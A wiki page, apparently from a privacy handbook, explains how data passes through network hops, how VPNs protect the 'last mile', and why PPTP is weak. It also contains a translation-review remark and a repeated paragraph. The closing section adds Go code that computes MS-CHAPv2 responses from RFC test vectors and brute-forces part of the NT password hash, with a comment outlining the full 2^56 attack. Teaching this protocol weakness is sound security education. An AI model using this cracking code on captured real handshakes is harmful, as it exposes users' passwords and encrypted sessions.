The path your data takes to the requested server and back to your computer or mobile device is not as straightforward as it may seem. Let us assume you are connected to a home wireless network and open the page wikipedia.org. The path of your request (data) will consist of several intermediate points, or "hops" in network-architecture terminology. At each of these hops (there will probably be more than 5) your data can be viewed, copied and possibly modified. For example:

Translation review
next_ghost (Correct, but needs rewording) In the third sentence "dotazu" would be better than "požadavku", and "hop" should be translated according to the glossary. In the penultimate sentence the predicate does not agree with the subject. Otherwise OK.


The way your data makes it to the desired server and back to your laptop or mobile device is not as straightforward as it might seem. Suppose you are connected to a wireless network at home and open a wikipedia.org page. The path your request (data) takes consists of multiple intermediate points, or „hops“ in network-architect terminology. At each of these hops (likely more than 5) your data can be scooped up, copied and potentially modified. For example:

  • Your wireless network (your data can be sniffed from the air)
  • Your ISP (in most countries they are obliged to keep detailed logs of user activity)
  • Internet Exchange Point (IXP) somewhere on another continent (usually more secure than any other hop)
  • ISP of the hosting company that hosts the site (is probably keeping logs)
  • Internal network to which the server is connected
  • And multiple hops between…

Any person with physical access to the computers or networks on the way from you to the remote server can, intentionally or not, collect and reveal the data passing between you and the remote server. This is especially true for the last few hops an Internet connection makes to reach a user, the so-called 'last mile': domestic and public wireless or wired networks, telephone and mobile networks, networks in libraries, homes, schools and hotels. Your ISP cannot be considered a safe or 'data-neutral' party either. In many countries state agencies do not require a warrant to access your data, and there is always the risk of intrusion by paid attackers working for adversaries with deep pockets.

VPN - a Virtual Private Network - is a solution for this 'last-mile' leakage. VPN is a technology that allows the creation of a virtual network on top of an existing infrastructure. Such a VPN network operates using the same protocols and standards as the underlying physical network. Programs and operating systems use it transparently, as if it were a separate network connection. But its topology - how network nodes (you, the VPN server and, potentially, other members or services available on VPN) are interconnected in relation to the physical space - is entirely redefined.

Imagine that instead of having to entrust your data to a series of middlemen (your local network, ISP, the state) you have the choice to pass it via the server of a trusted VPN provider (recommendation or research can help here). From there your data starts its journey to the remote location. VPN allows you to recreate your local and geo-political context altogether: from the moment your data leaves your computer and enters the VPN tunnel it is encrypted (OpenVPN, for example, runs over TLS; L2TP/IPsec uses IPsec), so it appears as random noise to any node on the way that might be spying on you. It is as if your data were traveling inside an independent titanium-alloy pipe, unbreakable all the way from your laptop to the VPN server. Of course one could argue that once your data leaves the safe harbour of the VPN it becomes vulnerable again, and this is partially true: the VPN server and every hop after it see whatever your applications did not encrypt themselves (use HTTPS inside the tunnel for anything sensitive), and the provider now occupies the position your ISP used to have. But once your data exits the VPN server it is far away from you - beyond the reach of creeps sniffing on the local wireless network, your venal ISP or a government obsessed with anti-terrorism laws. A serious VPN provider will have its servers installed at a high-security Internet exchange location, making physical access, tapping or logging a more difficult task.

„Today everything you do on the Internet is monitored and we want to change that. With our fast VPN service you become totally anonymous on the Internet. It's also possible to surf censored web sites that your school, ISP, work or country are blocking. [DarkVPN] will not only help people to surf anonymously, it also helps people in countries like China to be able to surf censored web pages. Which is your democratic right. DarknetVPN gives all VPN users an anonymous IP address. All electronic tracks will end up with us. We do not save any log files in order to achieve maximum anonymity. With us you are always surfing anonymously, securely and encrypted.“

Another interesting and often underrated feature of a VPN is encoded in its name: besides being Virtual and Private it is also a Network. A VPN allows not only connections via the VPN server to the rest of the world but also communication with other members of the same VPN, without ever leaving the encrypted space. Through this functionality a Virtual Private Network becomes something like a DarkNet (in the broader sense of the definition): a network isolated from the Internet and inaccessible to uninvited guests. A connection to the VPN server, and thus to the private network it facilitates, requires a key or a certificate, so only „invited“ users are allowed in. An Internet stranger cannot gain access to what is on a VPN without enrolling as a user or stealing someone's keys. While not usually referred to as such, any corporate Intranet-type network is technically a DarkNet too.

„A virtual private network (VPN) is a technology for using the Internet or another intermediate network to connect computers to isolated remote computer networks that would otherwise be inaccessible.“ (http://en.wikipedia.org/wiki/Virtual_private_network)

Many commercial VPN providers stress the anonymity that their service provides. Quoting the Ipredator.org page (a VPN service started by the people behind The Pirate Bay project): „You'll exchange the IP address you get from your ISP for an anonymous IP address. You get a safe/encrypted connection between your computer and the Internet“. Indeed, when you access the Internet via a VPN connection, the sites you visit see the connection as originating from the IP address of the IPredator server; only the provider can link it back to the address your ISP gave you.

„You'll exchange the IP address you get from your ISP for an anonymous IP address. You get a safe/encrypted connection between your computer and the Internet.“ (https://www.ipredator.se)


Just because you are using a VPN doesn't mean the encryption it uses is secure. It is important to be aware of the risks when signing up with a VPN provider, because some of the connection types they offer are breakable. If you really need a high level of security then do not use the connection type PPTP. PPTP is one of the older VPN technologies. It is known to use weaker encryption than either L2TP/IPsec or OpenVPN, though it may still be useful for bypassing Internet blocking and does give some level of encryption. The client software is conveniently built into most versions of Microsoft Windows, Apple and Linux computers and even mobile phones, and it is very easy to set up. But a PPTP VPN session can be broken for very little money using a service such as Cloud Cracker: PPTP authenticates with MS-CHAPv2, whose challenge-response can be cracked by a single exhaustive search of the 56-bit DES key space, and the recovered NT password hash is also the key material for the session's MPPE (RC4) encryption, so a recorded session can be decrypted afterwards.
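As an added example, not code from the original page or from the Cloud Cracker service, the following Go program implements the MS-CHAPv2 NT-Response computation from RFC 2759 and then performs the cheap part of the attack described above: from one captured challenge/response pair it recovers the last two bytes of the NT password hash with at most 65536 DES trials. The inputs are the RFC's own worked example (user "User", password "clientPass"); the NT hash is copied from the RFC rather than computed, so no MD4 implementation is needed, and the 2^56 search for the remaining fourteen hash bytes is described in a comment but not run.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
)

// Worked example from RFC 2759 section 9.2 (user "User", password "clientPass").
// ntHash is MD4 of the UTF-16LE password, taken from the RFC so no MD4 is needed here.
var (
	userName      = []byte("User")
	authChallenge = mustHex("5B5D7C7D7B3F2F3E3C2C602132262628")
	peerChallenge = mustHex("21402324255E262A28295F2B3A337C7E")
	ntHash        = mustHex("44EBBA8D5312B8D611474411F56989AE")
	rfcNTResponse = mustHex("82309ECD8D708B5EA08FAA3981CD78544C932D2B7BB3D57A")
)

func mustHex(s string) []byte { b, _ := hex.DecodeString(s); return b } // fixed constants above

// challengeHash is ChallengeHash() from RFC 2759 section 8.2: the first 8 bytes
// of SHA-1 over PeerChallenge || AuthenticatorChallenge || UserName.
func challengeHash(peer, auth, user []byte) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write(user)
	return h.Sum(nil)[:8]
}

// desKey7to8 spreads 56 key bits over 8 bytes, one spare bit per byte, and sets
// odd parity on it (RFC 2759 section 8.6). DES itself ignores the parity bits.
func desKey7to8(k7 []byte) []byte {
	v := binary.BigEndian.Uint64(append([]byte{0}, k7[:7]...))
	k8 := make([]byte, 8)
	for i := range k8 {
		k8[i] = byte(v>>(49-7*uint(i))&0x7F) << 1
		if bits.OnesCount8(k8[i])%2 == 0 {
			k8[i] |= 1
		}
	}
	return k8
}

// desEncrypt is DesEncrypt() from the RFC: one DES block under a 7-byte key.
func desEncrypt(key7, block []byte) []byte {
	c, _ := des.NewCipher(desKey7to8(key7)) // key is always 8 bytes, so no error
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ntResponse is ChallengeResponse(): the 16-byte NT hash is padded with five
// zero bytes to 21 bytes and cut into three 7-byte DES keys, each of which
// encrypts the same 8-byte challenge hash.
func ntResponse(challenge8, hash []byte) []byte {
	z := make([]byte, 21)
	copy(z, hash)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(z[7*i:7*i+7], challenge8)...)
	}
	return resp
}

// crackThirdKey is what a passive sniffer can do with one captured handshake:
// the third key is 2 real hash bytes plus 5 known zeros, so 65536 DES trials
// recover ntHash[14:16]. Returns the recovered 16 bits and whether they were found.
func crackThirdKey(challenge8, response []byte) (uint16, bool) {
	target := response[16:24]
	key := make([]byte, 7)
	for cand := 0; cand < 1<<16; cand++ {
		key[0], key[1] = byte(cand>>8), byte(cand)
		if bytes.Equal(desEncrypt(key, challenge8), target) {
			return uint16(cand), true
		}
	}
	return 0, false
}

func main() {
	chal := challengeHash(peerChallenge, authChallenge, userName)
	resp := ntResponse(chal, ntHash)
	fmt.Printf("challenge hash: %X\n", chal)
	fmt.Printf("NT-Response:    %X (matches RFC 2759 vector: %v)\n", resp, bytes.Equal(resp, rfcNTResponse))
	k3, ok := crackThirdKey(chal, resp)
	fmt.Printf("hash bytes 14..15 after at most 2^16 trials: %04X found=%v\n", k3, ok)
	// The other 14 hash bytes sit in keys 1 and 2. Both encrypt the same
	// challenge, so one pass over all 2^56 DES keys checks both outputs at once;
	// that fixed-cost search is what a PPTP cracking service sells.
}
```

Run it with `go run`. Everything the attacker needs (user name, both challenges, the 24-byte response) travels in the clear in the PPTP handshake, which is why capturing a single session on the last mile is enough; the recovered NT hash then also yields the MPPE key for that session.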

encs/cph/vpn.txt · Last modified: 2013/03/31 15:05 (external edit)
Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 3.0 Unported